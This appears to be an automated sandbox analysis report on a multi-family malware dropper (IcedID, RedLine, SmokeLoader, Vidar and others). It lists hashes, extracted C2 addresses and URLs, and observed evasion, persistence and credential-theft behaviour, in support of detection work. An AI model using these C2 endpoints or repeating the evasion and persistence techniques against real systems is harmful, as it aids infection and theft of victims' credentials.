icedid | 4e187f643987379c5429a9a36dee8df98eb43683b4cc28cb20dc6b3de5985b1a

Analysis

max time kernel
77s
max time network
1233s
platform
windows11_x64
resource
win11
submitted
04-11-2021 20:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

4.9MB
MD5

841435f4e45af49e375b0160ed81aa3d
SHA1

8b5db2582d1278329f143fa6f21b225d09e57af7
SHA256

4e187f643987379c5429a9a36dee8df98eb43683b4cc28cb20dc6b3de5985b1a
SHA512

8d83a36907abd5ff74e10327ba1d949e887686ac6d647309c248c61b2f76ce0ce2b7ae685f373e70de1a3a2c9fa2879464b82e8d38d7d189fb0710627dce682c

Score

10^/10

icedid metasploit redline smokeloader socelars vidar media0421 newjust 3055572094 aspackv2 backdoor banker discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

redline

Botnet

media0421

91.121.67.60:23325

Extracted

Family

redline

Botnet

newjust

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

http://honawey70.top/

http://wijibui00.top/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

icedid

Campaign

3055572094

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4416	4840	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4240	4840	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6332	4840	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6536	4840	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5224-341-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/5140-340-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/5224-346-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5140-345-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu180670b7bfc47.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu180670b7bfc47.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 12 IoCs

Processes:

WerFault.exemshta.exesetup.exeWerFault.exeWerFault.exemshta.exeWerFault.exeWerFault.execmd.exe

description	pid	process	target process
PID 1628 created 4512	1628	WerFault.exe	ACrRRCy_PVvlLRvop9iB4H3C.exe
PID 3956 created 4000	3956	mshta.exe	VARgFvFywJuQwzrhvgVFxyC3.exe
PID 6012 created 5724	6012	setup.exe	1SLstj9ScczTIceTxvhx8luB.exe
PID 2616 created 1408	2616		u9qTTr40Xxg758zF6KiHjuUS.exe
PID 1720 created 4092	1720	WerFault.exe	Thu180670b7bfc47.exe
PID 5272 created 412	5272	WerFault.exe	720WMATpgfGyyfaE9ahTIhZe.exe
PID 4556 created 5220	4556	mshta.exe	rundll32.exe
PID 3048 created 6060	3048	WerFault.exe	JlhyXA2fuCVH33Au3c68hBjV.exe
PID 6012 created 408	6012	setup.exe	ejs6iDeyGif8RvVGthhC5xbB.exe
PID 6164 created 3124	6164	WerFault.exe	WerFault.exe
PID 6244 created 5288	6244		Ad9sMunB7HgTcrhw_BIBEgDd.exe
PID 6576 created 3360	6576	cmd.exe	Thu18a3a314f20e06.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4512-311-0x0000000002290000-0x0000000002366000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\libcurl.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

setup_installer.exesetup_install.exeThu18bc30a51e137d0.exeThu185371386aa533.exeThu18b818b5afea12f2.exeThu18bc30a51e137d0.tmpThu181d864eb8.exeThu18ba5035cf136.exeThu18a3a314f20e06.exeThu1877bc7d13.exeThu18e397420e63c.exeThu182fbc50b73fe9.exeThu1896053d84146.exeThu180670b7bfc47.exeThu18f6e6cc3c274.exeThu18bc30a51e137d0.exeThu18f1102ca36b120b0.exeThu18f6e6cc3c274.tmpThu18bc30a51e137d0.tmpThu18ba5035cf136.exeThu18a708c1b35ca7.exeschtasks.exeDYbALA.exeTteQK.EXE81R77JCTZ3byGaXglbRIg3BR.exe5P1GWzowbdxGzxPb5GNtTRrD.exeThu18f1102ca36b120b0.exeThu1845e47d7bd.exe756499.exeLzmwAqmV.exe2404643.exePPv65Uo0MocOVyPD7XCCYIEH.exesvchost.exeJlhyXA2fuCVH33Au3c68hBjV.exeWerFault.exeWerFault.exec1oaTvAcLhJPswj4Gu0dR0kb.exeVARgFvFywJuQwzrhvgVFxyC3.exemsedge.exeu9qTTr40Xxg758zF6KiHjuUS.exeBCleanSoft82.exeWerFault.exe1SLstj9ScczTIceTxvhx8luB.exe1fIWg3FE_6WeASiOX_SUyRrH.exeQ10UKn8KMDXewY_XUSlOELbp.exemHay6_8dEOokHG0nEKL5XFNh.exeACrRRCy_PVvlLRvop9iB4H3C.exeAd9sMunB7HgTcrhw_BIBEgDd.exeejs6iDeyGif8RvVGthhC5xbB.exeWerFault.exe6g155AgwE1phmzSP_PBZ1bUu.exe1177382.exe359211.exeGvBN6zK33n6LSJ_Am0RL73Hx.exe720WMATpgfGyyfaE9ahTIhZe.exesKQPtMAl2c4p1aVoKRTiIeFm.exeQpj8Yk78ma5O1_5fRpblI_Cq.exeConhost.exeRVlyLya_hhDwFuthcHwjl9aN.exeschtasks.exenDCHVODmwBWHh3NVLA1Bq0Nt.exechrome.exejg1_1faf.exePxUlXBJmw5AeBLIVy2Hr1GbW.exe

pid	process
1772	setup_installer.exe
1380	setup_install.exe
3168	Thu18bc30a51e137d0.exe
3436	Thu185371386aa533.exe
3720	Thu18b818b5afea12f2.exe
5108	Thu18bc30a51e137d0.tmp
1416	Thu181d864eb8.exe
4208	Thu18ba5035cf136.exe
3360	Thu18a3a314f20e06.exe
4000	Thu1877bc7d13.exe
3472	Thu18e397420e63c.exe
4984	Thu182fbc50b73fe9.exe
4512	Thu1896053d84146.exe
4092	Thu180670b7bfc47.exe
888	Thu18f6e6cc3c274.exe
3200	Thu18bc30a51e137d0.exe
2000	Thu18f1102ca36b120b0.exe
2232	Thu18f6e6cc3c274.tmp
3412	Thu18bc30a51e137d0.tmp
1772	Thu18ba5035cf136.exe
3052	Thu18a708c1b35ca7.exe
3300	schtasks.exe
5192	DYbALA.exe
5236	TteQK.EXE
5360	81R77JCTZ3byGaXglbRIg3BR.exe
5376	5P1GWzowbdxGzxPb5GNtTRrD.exe
5140	Thu18f1102ca36b120b0.exe
5224	Thu1845e47d7bd.exe
5544	756499.exe
5796	LzmwAqmV.exe
5908	2404643.exe
6028	PPv65Uo0MocOVyPD7XCCYIEH.exe
6040	svchost.exe
6060	JlhyXA2fuCVH33Au3c68hBjV.exe
2940	WerFault.exe
3048	WerFault.exe
2996	c1oaTvAcLhJPswj4Gu0dR0kb.exe
4000	VARgFvFywJuQwzrhvgVFxyC3.exe
3788	msedge.exe
1408	u9qTTr40Xxg758zF6KiHjuUS.exe
5684	BCleanSoft82.exe
3124	WerFault.exe
5724	1SLstj9ScczTIceTxvhx8luB.exe
5728	1fIWg3FE_6WeASiOX_SUyRrH.exe
5712	Q10UKn8KMDXewY_XUSlOELbp.exe
5736	mHay6_8dEOokHG0nEKL5XFNh.exe
4512	ACrRRCy_PVvlLRvop9iB4H3C.exe
5288	Ad9sMunB7HgTcrhw_BIBEgDd.exe
408	ejs6iDeyGif8RvVGthhC5xbB.exe
5440	WerFault.exe
1340	6g155AgwE1phmzSP_PBZ1bUu.exe
5972	1177382.exe
1660	359211.exe
964	GvBN6zK33n6LSJ_Am0RL73Hx.exe
412	720WMATpgfGyyfaE9ahTIhZe.exe
5748	sKQPtMAl2c4p1aVoKRTiIeFm.exe
5264	Qpj8Yk78ma5O1_5fRpblI_Cq.exe
5940	Conhost.exe
1812	RVlyLya_hhDwFuthcHwjl9aN.exe
3256	schtasks.exe
5084	nDCHVODmwBWHh3NVLA1Bq0Nt.exe
2072	chrome.exe
1540	jg1_1faf.exe
3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Q10UKn8KMDXewY_XUSlOELbp.exeACrRRCy_PVvlLRvop9iB4H3C.exe359211.exeGvBN6zK33n6LSJ_Am0RL73Hx.exeWerFault.exeproliv041.exeWerFault.exeWerFault.exe2404643.exeAd9sMunB7HgTcrhw_BIBEgDd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Q10UKn8KMDXewY_XUSlOELbp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ACrRRCy_PVvlLRvop9iB4H3C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	359211.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GvBN6zK33n6LSJ_Am0RL73Hx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GvBN6zK33n6LSJ_Am0RL73Hx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Q10UKn8KMDXewY_XUSlOELbp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ACrRRCy_PVvlLRvop9iB4H3C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	proliv041.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	proliv041.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2404643.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ad9sMunB7HgTcrhw_BIBEgDd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ad9sMunB7HgTcrhw_BIBEgDd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2404643.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	359211.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe

Loads dropped DLL 11 IoCs

Processes:

setup_install.exeThu18bc30a51e137d0.tmpThu18f6e6cc3c274.tmpThu18bc30a51e137d0.tmprundll32.exeQnlljkyKHLtHJ4T8OxJKUSTi.exe

pid	process
1380	setup_install.exe
1380	setup_install.exe
1380	setup_install.exe
1380	setup_install.exe
1380	setup_install.exe
5108	Thu18bc30a51e137d0.tmp
2232	Thu18f6e6cc3c274.tmp
3412	Thu18bc30a51e137d0.tmp
5220	rundll32.exe
5148	QnlljkyKHLtHJ4T8OxJKUSTi.exe
5148	QnlljkyKHLtHJ4T8OxJKUSTi.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

cmd.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	cmd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

2404643.exeQ10UKn8KMDXewY_XUSlOELbp.exeACrRRCy_PVvlLRvop9iB4H3C.exe359211.exeGvBN6zK33n6LSJ_Am0RL73Hx.exeproliv041.exeAd9sMunB7HgTcrhw_BIBEgDd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2404643.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Q10UKn8KMDXewY_XUSlOELbp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ACrRRCy_PVvlLRvop9iB4H3C.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	359211.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GvBN6zK33n6LSJ_Am0RL73Hx.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	proliv041.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ad9sMunB7HgTcrhw_BIBEgDd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 18 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
50	ipinfo.io
240	ipinfo.io
43	ipinfo.io
161	ipinfo.io
227	ipinfo.io
228	ipinfo.io
232	ipinfo.io
691	ipinfo.io
44	ipinfo.io
2	ip-api.com
167	ipinfo.io
225	ipinfo.io
232	ip-api.com
256	ipinfo.io
445	ipinfo.io
2	ipinfo.io
375	ipinfo.io
362	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

2404643.exeQ10UKn8KMDXewY_XUSlOELbp.exeWerFault.exeACrRRCy_PVvlLRvop9iB4H3C.exe359211.exeWerFault.exeGvBN6zK33n6LSJ_Am0RL73Hx.exeproliv041.exe

pid	process
5908	2404643.exe
5712	Q10UKn8KMDXewY_XUSlOELbp.exe
2940	WerFault.exe
4512	ACrRRCy_PVvlLRvop9iB4H3C.exe
1660	359211.exe
5440	WerFault.exe
964	GvBN6zK33n6LSJ_Am0RL73Hx.exe
664	proliv041.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

Thu18f1102ca36b120b0.exeschtasks.exeConhost.exeWerFault.exeAd9sMunB7HgTcrhw_BIBEgDd.exe

description	pid	process	target process
PID 2000 set thread context of 5140	2000	Thu18f1102ca36b120b0.exe	Thu18f1102ca36b120b0.exe
PID 3300 set thread context of 5224	3300	schtasks.exe	Thu1845e47d7bd.exe
PID 5940 set thread context of 4052	5940	Conhost.exe	c0QvszGxw8kIaCyd6yxTscOL.exe
PID 3124 set thread context of 3788	3124	WerFault.exe	msedge.exe
PID 5288 set thread context of 5896	5288	Ad9sMunB7HgTcrhw_BIBEgDd.exe	AppLaunch.exe

Drops file in Program Files directory 11 IoCs

Processes:

msedge.exePPv65Uo0MocOVyPD7XCCYIEH.exeThu18bc30a51e137d0.tmpc1oaTvAcLhJPswj4Gu0dR0kb.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	msedge.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	msedge.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	PPv65Uo0MocOVyPD7XCCYIEH.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	PPv65Uo0MocOVyPD7XCCYIEH.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu18bc30a51e137d0.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-989L9.tmp	Thu18bc30a51e137d0.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	msedge.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	c1oaTvAcLhJPswj4Gu0dR0kb.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu18bc30a51e137d0.tmp
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	msedge.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	c1oaTvAcLhJPswj4Gu0dR0kb.exe

Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Program crash 25 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4408	4000	WerFault.exe	Thu1877bc7d13.exe
1556	4512	WerFault.exe	Thu1896053d84146.exe
856	1408	WerFault.exe	u9qTTr40Xxg758zF6KiHjuUS.exe
2932	4092	WerFault.exe	Thu180670b7bfc47.exe
3200	5724	WerFault.exe	1SLstj9ScczTIceTxvhx8luB.exe
6108	412	WerFault.exe	720WMATpgfGyyfaE9ahTIhZe.exe
6236	3256	WerFault.exe	CH5sTuSjfVgsSOChurOcYPQ7.exe
3384	4000	WerFault.exe	VARgFvFywJuQwzrhvgVFxyC3.exe
2472	5728	WerFault.exe	1fIWg3FE_6WeASiOX_SUyRrH.exe
1760	5748	WerFault.exe	sKQPtMAl2c4p1aVoKRTiIeFm.exe
5216	2716	WerFault.exe	setup_2.exe
1616	5636	WerFault.exe	chrome2.exe
6764	6868	WerFault.exe	rundll32.exe
6720	6064	WerFault.exe	8186.exe
2376	5196	WerFault.exe	5MC7ydH4B7FYb4WawyRLQdeC.exe
3164	6440	WerFault.exe	VaDoDmACYW2fnMxDcTLYPWtu.exe
2004	5256	WerFault.exe	mahzor.exe
6440	6748	WerFault.exe	rundll32.exe
5440	4200	WerFault.exe	E341.exe
6240	6572	WerFault.exe	rundll32.exe
5320	5168	WerFault.exe	B6FF.exe
3796	5720	WerFault.exe	BHN_hoY5TwmP4vi38Sk9LCv7.exe
6484	3020	WerFault.exe	EFn_KFhIOd7BiflBgnYUTCJb.exe
7200	4668	WerFault.exe	ZGzMG2aBCaNBqGPzH0kHnNc5.exe
7320	6180	WerFault.exe	4E11.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

c0QvszGxw8kIaCyd6yxTscOL.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c0QvszGxw8kIaCyd6yxTscOL.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c0QvszGxw8kIaCyd6yxTscOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c0QvszGxw8kIaCyd6yxTscOL.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5920 schtasks.exe
3256 schtasks.exe
3300 schtasks.exe
5392 schtasks.exe
4544 schtasks.exe

pid	process
5920	schtasks.exe
3256	schtasks.exe
3300	schtasks.exe
5392	schtasks.exe
4544	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

7148 taskkill.exe
2916 taskkill.exe
1940 taskkill.exe
4384 taskkill.exe
5268 taskkill.exe
5452 taskkill.exe
5108 taskkill.exe

pid	process
7148	taskkill.exe
2916	taskkill.exe
1940	taskkill.exe
4384	taskkill.exe
5268	taskkill.exe
5452	taskkill.exe
5108	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeThu18b818b5afea12f2.exeThu181d864eb8.exe

pid	process
2100	powershell.exe
2100	powershell.exe
1996	powershell.exe
1996	powershell.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe
3720	Thu18b818b5afea12f2.exe
3720	Thu18b818b5afea12f2.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe
1416	Thu181d864eb8.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

c0QvszGxw8kIaCyd6yxTscOL.exe

pid process

4052 c0QvszGxw8kIaCyd6yxTscOL.exe

pid	process
4052	c0QvszGxw8kIaCyd6yxTscOL.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Thu180670b7bfc47.exepowershell.exepowershell.exeThu18e397420e63c.exeThu18a708c1b35ca7.exeWerFault.exetaskkill.exemHay6_8dEOokHG0nEKL5XFNh.exe6g155AgwE1phmzSP_PBZ1bUu.exeBCleanSoft82.exePxUlXBJmw5AeBLIVy2Hr1GbW.exe

description	pid	process
Token: SeCreateTokenPrivilege	4092	Thu180670b7bfc47.exe
Token: SeAssignPrimaryTokenPrivilege	4092	Thu180670b7bfc47.exe
Token: SeLockMemoryPrivilege	4092	Thu180670b7bfc47.exe
Token: SeIncreaseQuotaPrivilege	4092	Thu180670b7bfc47.exe
Token: SeMachineAccountPrivilege	4092	Thu180670b7bfc47.exe
Token: SeTcbPrivilege	4092	Thu180670b7bfc47.exe
Token: SeSecurityPrivilege	4092	Thu180670b7bfc47.exe
Token: SeTakeOwnershipPrivilege	4092	Thu180670b7bfc47.exe
Token: SeLoadDriverPrivilege	4092	Thu180670b7bfc47.exe
Token: SeSystemProfilePrivilege	4092	Thu180670b7bfc47.exe
Token: SeSystemtimePrivilege	4092	Thu180670b7bfc47.exe
Token: SeProfSingleProcessPrivilege	4092	Thu180670b7bfc47.exe
Token: SeIncBasePriorityPrivilege	4092	Thu180670b7bfc47.exe
Token: SeCreatePagefilePrivilege	4092	Thu180670b7bfc47.exe
Token: SeCreatePermanentPrivilege	4092	Thu180670b7bfc47.exe
Token: SeBackupPrivilege	4092	Thu180670b7bfc47.exe
Token: SeRestorePrivilege	4092	Thu180670b7bfc47.exe
Token: SeShutdownPrivilege	4092	Thu180670b7bfc47.exe
Token: SeDebugPrivilege	4092	Thu180670b7bfc47.exe
Token: SeAuditPrivilege	4092	Thu180670b7bfc47.exe
